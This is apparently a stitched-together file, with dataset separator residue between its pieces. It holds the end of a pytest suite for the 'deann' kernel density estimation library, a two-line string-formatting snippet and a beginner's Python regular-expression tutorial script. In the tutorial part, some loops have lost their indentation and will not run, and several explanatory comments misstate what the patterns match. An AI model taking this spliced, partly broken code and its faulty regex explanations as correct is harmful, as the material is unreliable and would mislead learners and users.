        ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float64))
        ann_estimator.query(np.ones((2,9),dtype=np.int64))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float64))
        ann_estimator.query(np.ones((2,9),dtype=np.float32))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.query(np.ones((2,9),dtype=np.float64))
    # query shape must be 1-D or 2-D with nonzero dimensions
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.query(np.ones((2,9,1),dtype=np.float32))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.query(np.ones((0,9),dtype=np.float32))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.query(np.ones((2,0),dtype=np.float32))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.query(np.ones(0,dtype=np.float32))
    # the wrapped ANN object must return well-formed results of the right type
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 1, 0,
                                                   AnnObjectInvalidType(False, False))
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.query(np.ones(9,dtype=np.float32))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 1, 0,
                                                   AnnObjectInvalidType(True, False, np.float32))
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.query(np.ones(9,dtype=np.float32))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 1, 0,
                                                   AnnObjectInvalidType(True, True, np.float32))
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.query(np.ones(9,dtype=np.float32))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 1, 0,
                                                   AnnObjectInvalidType(True, True, np.int32, np.int32))
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.query(np.ones(9,dtype=np.float32))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 100, 0,
                                                   AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 100,
                                                   AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 6, 6,
                                                   AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
    # reset_parameters must enforce the same k/m bounds as the constructor
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0,
                                                   AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.reset_parameters(100)
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0,
                                                   AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.reset_parameters(None, 100)
    with pytest.raises(ValueError):
        ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0,
                                                   AnnObject())
        ann_estimator.fit(np.ones((10,9),dtype=np.float32))
        ann_estimator.reset_parameters(6,6)
    # --- numerical behavior ---
    random_seed = 0x90f95369
    # absolute (DELTA*) and relative (EPSILON*) tolerances per float precision
    DELTA64 = 1e-15
    EPSILON64 = 1e-13
    DELTA32 = 1e-6
    EPSILON32 = 1e-5
    for dt in [np.float64, np.float32]:
        X, Y = construct_test_set()
        X = X.astype(dt)
        Y = Y.astype(dt)
        h = 21.0
        if dt == np.float64:
            DELTA = DELTA64
            # BUG FIX: was EPSILON32 — the float64 branch must use the
            # float64 relative tolerance (EPSILON is currently unused below,
            # but keep it consistent for future use).
            EPSILON = EPSILON64
        else:
            DELTA = DELTA32
            EPSILON = EPSILON32
        for kernel in ['exponential', 'gaussian']:
            metric = 'euclidean'
            bnn = BruteNN(metric)
            bnn.fit(X)
            # k == m == 0: estimator degenerates to all-zero output
            ann_estimator = deann.AnnEstimatorPermuted(h, kernel, 0, 0, AnnObject())
            ann_estimator.fit(X)
            (Z,S) = ann_estimator.query(Y)
            assert np.all(Z == 0)
            assert np.all(S == 0)
            # k == 1: the estimate for a single query must equal the kernel
            # value of its exact nearest neighbor, divided by n
            ann_object = AnnObject(bnn)
            ann_estimator = deann.AnnEstimatorPermuted(h, kernel, 1, 0, ann_object)
            ann_estimator.fit(X)
            # only the first query point is checked (the original loop broke
            # out immediately on its first iteration, leaving i == 0)
            i = 0
            q = Y[i,:]
            (Z,S) = ann_estimator.query(q)
            assert ann_object.num_of_calls == i+1
            nn_idx = find_nearest_neighbor(q,X,metric)
            x = X[nn_idx,:]
            dist = np.linalg.norm(q-x)
            mu = np.exp(-dist*dist/h/h/2) if kernel == 'gaussian' else np.exp(-dist/h)
            mu /= X.shape[0]
            assert Z.ndim == 1 and Z.shape[0] == 1
            assert Z[0] > 0
            assert mu > 0
            if dt == np.float64:
                assert np.abs(Z-mu) < DELTA64
                assert np.abs(Z-mu)/mu < EPSILON64
            elif dt == np.float32:
                assert np.abs(Z-mu) < DELTA32
                assert np.abs(Z-mu)/mu < EPSILON32
            assert S.ndim == 1 and S.shape[0] == 1
            assert S.dtype == np.int32
            assert S[0] == X.shape[0]
            # k == n: the estimator must reproduce the exact (NaiveKde) values
            ann_object = AnnObject(bnn)
            ann_estimator = deann.AnnEstimatorPermuted(h, kernel, X.shape[0], 0, ann_object)
            ann_estimator.fit(X)
            nkde = deann.NaiveKde(h, kernel)
            nkde.fit(X)
            start = time.time()
            (mu, S) = nkde.query(Y)
            end = time.time()
            print(f'nkde query took {end-start} s')
            start = time.time()
            (Z, S) = ann_estimator.query(Y)
            end = time.time()
            print(f'ann estimator query took {end-start} s')
            assert np.all(S == X.shape[0])
            assert ann_object.num_of_calls == Y.shape[0]
            assert np.all(np.abs(mu-Z) < DELTA)
            # k == 0, m > 0: identical to RandomSamplingPermuted with the
            # same seed, and the ANN object must never be called
            m = 123
            random_seed += m
            ann_object = AnnObject(bnn)
            ann_estimator = deann.AnnEstimatorPermuted(h, kernel, 0, m,
                                                       ann_object, random_seed)
            ann_estimator.fit(X)
            rs = deann.RandomSamplingPermuted(h, kernel, m, random_seed)
            rs.fit(X)
            (Z1, S1) = ann_estimator.query(Y)
            (Z2, S2) = rs.query(Y)
            assert ann_object.num_of_calls == 0
            assert np.all(np.abs(Z1-Z2) < DELTA)
            # mixed k/m configurations: check call counts, sample bounds,
            # seeded reproducibility, and error ordering
            k, m = 101,203
            random_seed += k*m
            ann_object = AnnObject(bnn)
            ann_estimator1 = deann.AnnEstimatorPermuted(h, kernel, k, 0,
                                                        ann_object)
            ann_estimator1.fit(X)
            (Z1, S1) = ann_estimator1.query(Y)
            assert ann_object.num_of_calls == Y.shape[0]
            assert np.all(S1 == X.shape[0])
            ann_estimator2 = deann.AnnEstimatorPermuted(h, kernel, k, 0,
                                                        ann_object)
            ann_estimator2.fit(X)
            (Z2, S2) = ann_estimator2.query(Y)
            assert ann_object.num_of_calls == 2*Y.shape[0]
            assert np.array_equal(Z1,Z2)
            assert np.all(S2 == X.shape[0])
            # pure sampling without a seed: two runs must differ
            ann_estimator3 = deann.AnnEstimatorPermuted(h, kernel, 0, m,
                                                        ann_object)
            ann_estimator3.fit(X)
            (Z3, S3) = ann_estimator3.query(Y)
            assert ann_object.num_of_calls == 2*Y.shape[0]
            assert np.all(S3 == m)
            ann_estimator4 = deann.AnnEstimatorPermuted(h, kernel, 0, m,
                                                        ann_object)
            ann_estimator4.fit(X)
            (Z4, S4) = ann_estimator4.query(Y)
            assert ann_object.num_of_calls == 2*Y.shape[0]
            assert not np.array_equal(Z3,Z4)
            assert np.all(S4 == m)
            # pure sampling with the same seed: two runs must agree exactly
            ann_estimator5 = deann.AnnEstimatorPermuted(h, kernel, 0, m,
                                                        ann_object, random_seed)
            ann_estimator5.fit(X)
            (Z5, S5) = ann_estimator5.query(Y)
            assert ann_object.num_of_calls == 2*Y.shape[0]
            assert np.all(S5 == m)
            ann_estimator6 = deann.AnnEstimatorPermuted(h, kernel, 0, m,
                                                        ann_object, random_seed)
            ann_estimator6.fit(X)
            (Z6, S6) = ann_estimator6.query(Y)
            assert ann_object.num_of_calls == 2*Y.shape[0]
            assert np.array_equal(Z5,Z6)
            assert np.all(S6 == m)
            # combined k > 0 and m > 0
            ann_estimator7 = deann.AnnEstimatorPermuted(h, kernel, k, m,
                                                        ann_object, random_seed)
            ann_estimator7.fit(X)
            (Z7, S7) = ann_estimator7.query(Y)
            assert ann_object.num_of_calls == 3*Y.shape[0]
            assert np.all(m + X.shape[0] <= S7)
            assert np.all(S7 <= 2*X.shape[0])
            ann_estimator8 = deann.AnnEstimatorPermuted(h, kernel, k, m,
                                                        ann_object, random_seed)
            ann_estimator8.fit(X)
            (Z8, S8) = ann_estimator8.query(Y)
            assert ann_object.num_of_calls == 4*Y.shape[0]
            # these should be equal but for some reason they are
            # not necessarily so; this is probably some MKL thing
            assert np.array_equal(Z7,Z8) or \
                dt == np.float32 and np.amax(np.abs(Z7-Z8)) < 1e-7
            assert np.all(m + X.shape[0] <= S8)
            assert np.all(S8 <= 2*X.shape[0])
            # combining NN and sampling must beat either component alone
            abs_error = np.mean(np.abs(Z7-mu))
            assert abs_error < np.mean(np.abs(Z5-mu))
            assert abs_error < np.mean(np.abs(Z1-mu))
            rel_error = np.mean(np.abs((Z7-mu)/mu))
            assert rel_error < np.mean(np.abs((Z5-mu)/mu))
            assert rel_error < np.mean(np.abs((Z1-mu)/mu))
            assert abs_error < 0.01
            assert rel_error < 0.1
def test_ann_estimator_permuted2():
    """Reproducibility of AnnEstimatorPermuted.

    Identical (h, kernel, k, m, seed) configurations must yield identical
    estimates and sample counts; different parameters and seed must yield
    entirely different ones; and reset_seed / reset_parameters must restore
    the original configuration exactly.
    """
    h = 37.0
    seed_a = 0xfed712db
    seed_b = 0x710867b8
    k_a, k_b = 123, 321
    m_a, m_b = 234, 432
    for dtype in [np.float32, np.float64]:
        X, Y = construct_test_set()
        X = X.astype(dtype)
        Y = Y.astype(dtype)
        for kernel in ['exponential', 'gaussian']:
            seed_a += 1
            seed_b += 1
            metric = 'euclidean'
            nn = BruteNN(metric)
            nn.fit(X)

            def fitted(k, m, seed):
                # helper: build and fit an estimator for the current data
                est = deann.AnnEstimatorPermuted(h, kernel, k, m, nn, seed)
                est.fit(X)
                return est

            ref, ref_samples = fitted(k_a, m_a, seed_a).query(Y)
            # same configuration -> bitwise identical output
            Z, S = fitted(k_a, m_a, seed_a).query(Y)
            assert np.array_equal(Z, ref)
            assert np.array_equal(S, ref_samples)
            # different parameters and seed -> everything differs
            Z, S = fitted(k_b, m_b, seed_b).query(Y)
            assert np.all(Z != ref)
            assert np.all(S != ref_samples)
            # resetting seed and parameters restores the reference output
            restored = fitted(k_b, m_b, seed_b)
            restored.reset_seed(seed_a)
            restored.reset_parameters(k_a, m_a)
            Z, S = restored.query(Y)
            assert np.array_equal(Z, ref)
            assert np.array_equal(S, ref_samples)
def test_ann_estimator_permuted3():
    """Check AnnEstimatorPermuted consistency across two BruteNN configurations.

    bnn1 is constructed with (metric, True, True) and bnn2 with
    (metric, False, False); presumably these flags toggle whether the NN
    backend returns distances/sample counts — TODO confirm against the
    BruteNN definition elsewhere in this file.
    """
    h = 24.0  # kernel bandwidth
    seed = 0xf520208d  # base seed, incremented once per (k, m) combination
    # absolute (DELTA*) and relative (EPSILON*) tolerances per float precision
    DELTA64 = 1e-15
    EPSILON64 = 1e-13
    DELTA32 = 1e-6
    EPSILON32 = 1e-5
    for dt in [np.float32, np.float64]:
        X, Y = construct_test_set()
        X = X.astype(dt)
        Y = Y.astype(dt)
        # NOTE(review): DELTA is assigned but never read in this function —
        # likely a leftover from the non-permuted variant of this test
        if dt == np.float32:
            DELTA = 1e-3
        else:
            DELTA = 1e-12
        for kernel in ['exponential', 'gaussian']:
            # NOTE(review): the 'laplacian' branch is dead here because the
            # kernel list above excludes it; metric is always 'euclidean'
            metric = 'taxicab' if kernel == 'laplacian' else 'euclidean'
            bnn1 = BruteNN(metric, True, True)
            bnn1.fit(X)
            bnn2 = BruteNN(metric, False, False)
            bnn2.fit(X)
            for k in [0, 123]:
                for m in [0, 321]:
                    seed += 1
                    ann1 = deann.AnnEstimatorPermuted(h, kernel, k, m, bnn1, seed)
                    ann1.fit(X)
                    (mu, S) = ann1.query(Y)
                    if k == 0 and m == 0:
                        # degenerate estimator: no neighbors, no samples
                        assert np.all(mu == 0)
                        assert np.all(S == 0)
                    else:
                        assert np.all(mu > 0)
                    # the permuted variant reports between n+m and 2n samples
                    # when k > 0, and exactly m samples when k == 0
                    if k > 0:
                        assert np.all(S >= X.shape[0] + m)
                        assert np.all(S <= 2*X.shape[0])
                    else:
                        assert np.all(S == m)
                    ann2 = deann.AnnEstimatorPermuted(h, kernel, k, m, bnn2, seed)
                    ann2.fit(X)
                    (Z, S) = ann2.query(Y)
                    assert mu.shape == Z.shape
                    assert S.shape == mu.shape
                    if k == 0:
                        # no NN component: both backends are bitwise identical
                        assert np.array_equal(Z,mu)
                        assert np.all(S == m)
                    else:
                        # with an NN component the two backends agree only up
                        # to floating-point tolerance
                        for i in range(mu.shape[0]):
                            if dt == np.float64:
                                assert np.abs(mu[i]-Z[i]) < DELTA64
                                assert np.abs(mu[i]-Z[i])/mu[i] < EPSILON64
                            else:
                                assert np.abs(mu[i]-Z[i]) < DELTA32
                                assert np.abs(mu[i]-Z[i])/mu[i] < EPSILON32
                        # NOTE(review): the third positional argument of
                        # np.allclose is rtol, so DELTA* acts as a relative
                        # tolerance here — confirm this is intended
                        assert np.allclose(mu, Z, DELTA64 if dt == np.float64 else DELTA32)
                        # NOTE(review): S == -1 presumably marks "sample count
                        # unavailable" for the (False, False) backend — confirm
                        assert np.all(S == -1)
if __name__ == '__main__':
    # Warm-up: run a single permuted random-sampling query before timing.
    X, Y = construct_test_set()
    X = X.astype(np.float32)
    Y = Y.astype(np.float32)
    h = 21.0
    kernel = 'gaussian'
    random_seed = 2432279547
    m = 123
    ann_object = BruteNN('euclidean')
    ann_object.fit(X)
    ann_estimator = deann.AnnEstimatorPermuted(h, kernel, 0, m, ann_object,
                                               random_seed)
    ann_estimator.fit(X)
    (Z5, S5) = ann_estimator.query(Y)
    # Execute every test case and report its wall-clock duration.
    all_tests = (test_naive_kde1, test_naive_kde2, test_random_sampling1,
                 test_random_sampling2, test_random_sampling_permuted,
                 test_brute_nn, test_linear_scan, test_ann_estimator1,
                 test_ann_estimator2, test_ann_estimator3, test_ann_faiss,
                 test_ann_estimator_permuted1, test_ann_estimator_permuted2,
                 test_ann_estimator_permuted3)
    for test_case in all_tests:
        started = time.time()
        test_case()
        elapsed = time.time() - started
        print(test_case.__name__, elapsed)
|
# Two equivalent ways of interpolating values into a string.
# BUG FIX: the first line used the Python 2 print statement (a syntax error
# under Python 3) and carried dataset-join residue; both now use print().
print("The %(foo)s is %(bar)i." % {'foo': 'answer', 'bar': 42})
print("The {foo} is {bar}".format(foo='answer', bar=42))
|
996,861 | 7bfee06201d235ff4de39f188414bc7b61fc6dcf | import re
re.search('n','\n') #first item is pattern and second item is string
#When we run the above code we don't get anything, because in Python '\n' means a newline: it is not
#two characters, it is a single character, i.e. a newline.
re.search('n','\\n')
#But when we give double \\ we will get the result, so a extra back slash treats it as 2 character
#But if we have more than one \n
re.search('n','\n\n\n\n') #Giving double back slash is not a good idea
#The best way to handle this is to convert it into raw string by using r'
re.search('n',r'\n\n\n')
#Regular has there own special character
#'\n' or r'\n both have a meaning of newline in regex
re.search('\n','\n\n\n') # Here in first parameter it is regex pattern while 2nd parameter is string
#The first parameter is a new line a/c to regex
re.search(r'\n','\n\n\n' )
#We get search result in both the case
#But when we convert the string to raw string then we will get no result
re.search(r'\n',r'\n\n\n' )
#So converting a string with raw string in 2nd parameter will affect the meaning of backslash
#But if we add r' to first parameter then it will change to regex own meaning i.e r'\n is new line in regex
####################################################################################################
# Methods of regex Match and Search
# re.search(pattern,string,flag)
# Pattern - The pattern that needs to search from string
# String - The string which will used to find pattern
# flag- Special option , it helps to situation where we neeed to find multiline
# The difference between match and search is:
# Match - it searches for the pattern only at the beginning of the string
# Search - it searches for the pattern everywhere in the string
re.match('c','abcdef') #No result found because c is not present at beginging of string
re.search('c','abcdef') #Ressult found because c is present in the string, span(2,3) means the search value
#found at 2nd location and ends at 3rd location
#We can use boolean value also
bool(re.match('c','abcdef'))
# It is only a way how none value can be converted to false
#The problem with search is it only checks for 1 occurance from whole string
re.search('c','abcdcf') # Here span(2,3) shows that 2nd location and ends at 3rd location
#wherease the c also present at 4 position
# Search also works for multi line or new line
re.search('c','abdef\nc') # here we get the match at span(6,7)
re.match('c','abdef\nc') # Match does'nt give any result with newline
#To take print of match pattern
re.match('a','abcdef').group() # here in paraenthesis of group default value is 0
#if we want start and end value of span
re.search('c','abcdef').start()
re.search('c','abcdef').end()
#Literal matching
re.search('na','abcdefnc abcd') #We didnt get any result as 'na' is a single pattern to be found in string
#But when we write
re.search('n|a','abcdefnc abcd') #here it is searching for either n or a
#here a returned because it searches for first instance of either n or a , which may come first
#And here a comes first
# we may write more than or condition
re.search('n|a|b','abcdef nbca')
# Findall
#Search will pull out only first instance where findall will search only instance
re.findall('n|a','bcdefnc abcda') # It will return a list with all presence of n or a in string
#Multiple character
re.search('abcd','abcdef abcd') #It will find occurance of abcd at span(0,4)
re.findall('abcd','abcdef abcd') #It will give list of abcd at two occurance
###########################################################################################
#Character Set
#It can match a set of character
#\w - matches alpha numeric charcater - ie. a-z,A-Z,0-9, It represents any character in the set [a-zA-Z0-9_]
re.search(r'\w\w\w\w','abcdefnc abcd')
# Here 4 alpha numeric charcter is searched , it can be anything i.e abcd or 12m
re.search(r'\w\w\w\w','ab_defnc abcd') # here we get a12d as it is alpha numeric character
re.search(r'\w\w\w\w','ab_.efnc abcd') #Here we did'nt find any symbol . in [a-zA-Z0-9_] So efnc came as result
#Now \W - upper case W any thing which is not included in lower case w is taken by upper case W
re.search(r'\w\w\W','ab.efnc abcd') # So here lower case w does'nt include . and upper case W does, so in
#result we find .
re.search(r'\w\w\W\W','ab. fnc abcd') #here empty set is also printed
#Quantifier - a quantity measurement
#A quantifier comes after the character it applies to
# + = 1 or more - gridy quantifier
# ? = 0 or 1
# * = 0 or more
# {n,m} = n to m repetations {,3},{3,} n = least and m = most amount or lower bound to upper bound
re.search(r'\w\w','abcdef abcd') # So we find 2 charcter ab
re.search(r'\w+','abcdef abcd') # So here 1 or more character came abcdef but not blank space
re.search(r'\w?','abcdef abcd') # So here 1 or one character came a
re.search(r'\w*','abcdef abcd') # So here 0 or more character came abcdef
re.search(r'\w+\W+\w+','abcdef abcd') # so here all alpha numeric character and blank space and all alpha numeric
#Pulling out specific amount
re.search(r'\w{3}','aaaaaaaaaaa') #Only 3 alpha numeric character
re.search(r'\w{1,3}','aa.') #Start at 1 and till 3 but here since at 3rd position we have . so result is aa
re.search(r'\w{1,10}\W{0,10}\w+','abcdef abcd') # 1-10 alpha numeric character of lower w
# 0-10 upper W character
# 1 or more alpha numeric character of lower w
######################################################################################################
#Other type of character set
#'\d - matches digits [0-9]
#'\D - matches any non digit charcter - ~\d any thing that \d does'nt work for
string = '23abcde++'
re.search('\d+',string).group() #Here 1 or more digit printed 23
#'\s' - matches any whitespace character i.e newline,tab,spaces
# '\S' - matches any non whitespace character - ~\s
re.search('\S+',string).group() #No whitespace , so full string is grabed
string = '''Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.
Vines and some fungi extend from their tips to explore their surroundings.
Elliot Hawkes of the University of California in Santa Barbara
and his colleagues designed a bot that works
on similar principles. Its mechanical body
sits inside a plastic tube reel that extends
through pressurized inflation, a method that some
invertebrates like peanut worms (Sipunculus nudus)
also use to extend their appendages. The plastic
tubing has two compartments, and inflating one
side or the other changes the extension direction.
A camera sensor at the tip alerts the bot when it’s
about to run into something.
In the lab, Hawkes and his colleagues
programmed the robot to form 3-D structures such
as a radio antenna, turn off a valve, navigate a maze,
swim through glue, act as a fire extinguisher, squeeze
through tight gaps, shimmy through fly paper and slither
across a bed of nails. The soft bot can extend up to
72 meters, and unlike plants, it can grow at a speed of
10 meters per second, the team reports July 19 in Science Robotics.
The design could serve as a model for building robots
that can traverse constrained environments
This isn’t the first robot to take
inspiration from plants. One plantlike
predecessor was a robot modeled on roots.'''
(re.findall('\S+',string)) #It is getting all the words that does'nt have any space
' '.join(re.findall('\S+',string)) # It removes all the spaces and join words and return the article
# . - The dot matches any character except new line
string = '''Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.
Vines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something.
In the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72 meters, and unlike plants, it can grow at a speed of 10 meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments
This isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'''
re.search('.+',string).group()
#'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.'
# The above line is returned because dot will all character except new line
re.search('.+',string,flags = re.DOTALL).group() # It will include the new also
#Creating Your own character set
#[A-Z] - It means A to Z , '-' is a metacharacter It include all upper letter
string = 'Hello , There , How , Are , You'
re.findall('[A-Z]',string) # It will pull all upper case charcter
re.findall('[A-Z, ]',string) # It will pull all upper case charcter and a comma, here , is a charactter that we need to search
string = 'Hello , There , How , Are , You...'
re.findall('[A-Z,.]',string) # Same here dot is working as a charcter not like re dot i.e '.+' in line 192
re.findall('[A-Za-z,\s.]',string) # Here we are pulling A-Z capital,a-z small,comma,any space or whitespace and Dot
####################################################################################################
#Quatifier with Custom set
string = 'HELLO, There, How, Are, You...'
re.search('[A-Z]+',string) # Here HELLO is printed in upper case as we are asking for 1 or more capital case
re.findall('[A-Z]+',string) # Here 'HELLO', 'T', 'H', 'A', 'Y' is found as findall searches for whole string
re.findall('[A-Z]{2,}',string) # Here 'HELLO' 2 or more findall searches for whole string
re.search('[A-Za-z\s,]+',string) # one or more of 4 types of character
re.findall('[A-Z]?[a-z\s,]+',string) # Here ? means 0 or 1 and lower a-z \s and , for 1 or more
re.search('[^A-Za-z\s,]+',string) # Carrot inside of custom bracket means not this. Means not like A-Za-z\s
re.findall('[^A-Za-z]',string) # Not A-Z or Not a-z
#Groups
#Groups allow us to pull out section of a match and store them
string = 'John has 6 cats but I think my friend Susan has 3 dogs and Mike has 8 fishes'
re.findall('[A-Za-z]+ \w+ \d+ \w+',string) # So here we are trying to find Any upper or lower case 1 or more followed by
# space and character followed by space and number followed by character
re.findall('([A-Za-z]+) \w+ \d+ \w+',string) # So here if you see we have given () inside 'qutoes' this is group
# Actually it is trying to make a group of A-Z and a-z
# here it gives John Susan Mike because when it started at beginging
# John is first group came then there space then Susan ..
match = re.search('([A-Za-z]+) \w+ (\d+) (\w+)',string) # Here ([A-Za-z]+) = Group1,(\d+)=Group2,(\w+)=Group3
match.groups()
match.group(1)
match.group(1,2)
#Span - start and end
match.span() # It is showing the begining and end of match string - john is 'j' = 0 and end at 15
match.span(0) # Group 0 start and end location
# find all has no group function
re.findall('([A-Za-z]+) \w+ (\d+) (\w+)',string).group(1) # It will throwh the error
re.findall('([A-Za-z]+) \w+ (\d+) (\w+)',string) # It will return as list
re.findall('([A-Za-z]+) \w+ (\d+) (\w+)',string)[0] # It will return a tupple as slicing
data = re.findall('(([A-Za-z]+) \w+ (\d+) (\w+))',string) #There we are putting small groups into large group
# 'John has 6 cats' This is main group
# 'John', '6', 'cats' - This is sub group
for i in data:
print(i[0])
# We can use Iteration
it = re.finditer('(([A-Za-z]+) \w+ (\d+) (\w+))',string) #Finditer -> It takes complete set of data and then 1 by 1 data
# is pulled from iter variable
next(it).group()
for element in it:
print(element.group())
#####################################################################################################
#Quantifier with Group
string = 'New York, New York 11369'
#([A-Za-z\s]+) -> city group
#([A-Za-z\s]+) -> State group
#(\d+) -> Number Group
match = re.search('([A-Za-z\s]+),([A-Za-z\s]+) (\d+)',string)
match
match.group(1),match.group(2),match.group(3),match.group(0) # Here we are representing the group with number
# i.e group[1]=city,group[2]=state and ... so it might be tough
# to remember the number if group is big so we take name in group
#To name a group - ?P<group name> , group name inside the <>,followed by RE for group
#(?P<city>)
pattern = re.compile('(?P<City>[A-Za-z\\s]+),(?P<State>[A-Za-z\\s]+)(?P<ZipCode>\\d+)')
#Here we are just saving the pattern of regular expression in a variable
match = re.search(pattern,string)
match.group('City'),match.group('State'),match.group('ZipCode')
#######################################################################################################
#Split
#Example 1
re.split('\.','Today is Sunny. I want to go the park. I want to ride by-cycle')
#Include split point
re.split('(\.)','Today is Sunny. I want to go the park. I want to ride by-cycle')
#split with point another example
split = '.'
[i+split for i in re.split('\.','Today is Sunny. I want to go the park. I want to ride by-cycle')]
#Try to split at each tag
string = '<p>My mother has <span style="color:blue">blue</span> eyes. </p>'
#so we write for alpha numeric character
re.split('<\w+>',string) # It will work as spaces and quatation mark is not port of alpha numeric
re.split('<.+>',string) # here we are getting 2 empty string becaz at first it looks for <p> and last </p>, + is greedy quantifier
re.split('<[^<>]+>',string) # when ^ inside [] means negates i.e any charcter that does'nt have <>
# so it will not take <> from entire string
#Handling empty string
[i for i in re.split('<[^<>]+>',string)]
#Alternative method
re.findall('>([^<]+)<',string) # here it starts with open > and take pattern which has does'nt start with < and then has
# end up with <
#Another example
string = ',happy , birthday,'
list(filter(None,string.split(','))) # here none any element that has no meaning i.e space,we filter it out
# filter is generator so list is used
#re.sub - It utilizes regular expression and then substitute series of words from output of regular expression
string ="""U.S. stock-index futures pointed
to a solidly higher open on Monday,
indicating that major
benchmarks were poised to USA reboundfrom last week’s sharp decline,
\nwhich represented their biggest weekly drops in months."""
print(re.sub('U.S|US|USA','United States',string)) # Here U.S|US|USA= Regular Expression,United States=Substitute word
# string = Original String. This is what re.sub works
#Using function with sub
#Brief explanation with lambda
def square(x):
    """Return x raised to the second power."""
    return x * x
#With lambda
square = lambda x : x**2 # Here x before : is input and x**2 after : is output
# Lambda is quick way of creation of function which is small
square(3)
string = 'Dan has 3 snails. Mike has 4 cats. Alisa has 9 monkey'
#we are going to square digits i.e 3 to 9,4 to 16 and 9 to 81
re.search('(\d+)',string).group()
#It gives 3 as search will find first occurance
re.findall('(\d+)',string)
re.sub('(\d+)','1',string) # Here all digit is substituted with 1.
re.sub('(\d+)',lambda x:str(square(int(x.group(0)))),string)
# step 1 lambda x : x.group x is matching object and x is output of (\d+) this regular expression
# group(0) represents all group i.e not a specific group 1 or 2
# Turn the result into int
# use square function
# turn back to string
#Another example
input = 'eat laugh sleep study'
result = re.sub('(\w+)',lambda x:x.group(0)+'ing',input)
print(result)
#Backrefrencing
string = 'Merry Merry Christmas'
#We try to remove duplicate by backrefrencing
re.sub(r'(\w+) (\1)',r'Happy \1',string)
#So here we are putting group 1 with 'Happy' that was previously Merry
##############################################################################################################
#Word Boundaries
'''
\b - is called 'boundary' and allows to isolate word
- is similar to ^ and $ , it checks for location
'''
string = 'Cat Catherine Catholic wildCat copyCat unCatchable'
pattern = re.compile('Cat')
re.findall(pattern,string)
#It just to see for Cat from all the string But we want only Cat word not Cat from Catherine
#We use boundaries
pattern = re.compile(r'\bCat\b') #We are making a boundary from left and right to cat
re.findall(pattern,string)
#How \b works - It looks for both sides , left and right of boundary(\b) and insure that one side has one alphanumeric chr.
# and other side does'nt have alphanumric chr. so for word Catherine ,(Cat \b herine) it checks for chr left of boundary
# i.e \b and find alpha numeric chr and right to \b find another alpha numeric chr - so it does'nt satisfy condition
# But for 'wildCat' wild\bcat it checks for left and find alpha numeric chr i.e 'd' but in right non-alpha numeric chr(space)
# And it satify the condition
###########################################################################################################
#Capture
#Consume
#Capture is mainly used in connection with groups . When group output something then it is known as capture group
#So Group has 2 forms capture and Non Capture Group , Non Capture means the group matches with pattern but does'nt
#return anything and if it returns then it is capture group
#Consume - for example if we have 'Welcome to python'
# and we have pattern ('\w+') so for finding the pattern the cursor will start from W of Welcome and till e
# so regular expression consume From W to e and will consume Welcome. But when it goes after e then Space comes
# which is nothing but Non-Alphanumric character so cursor will to next word to and check for consumption
#Look Around dont consume, They allow us to conirm some sort of subpattern is ahead or
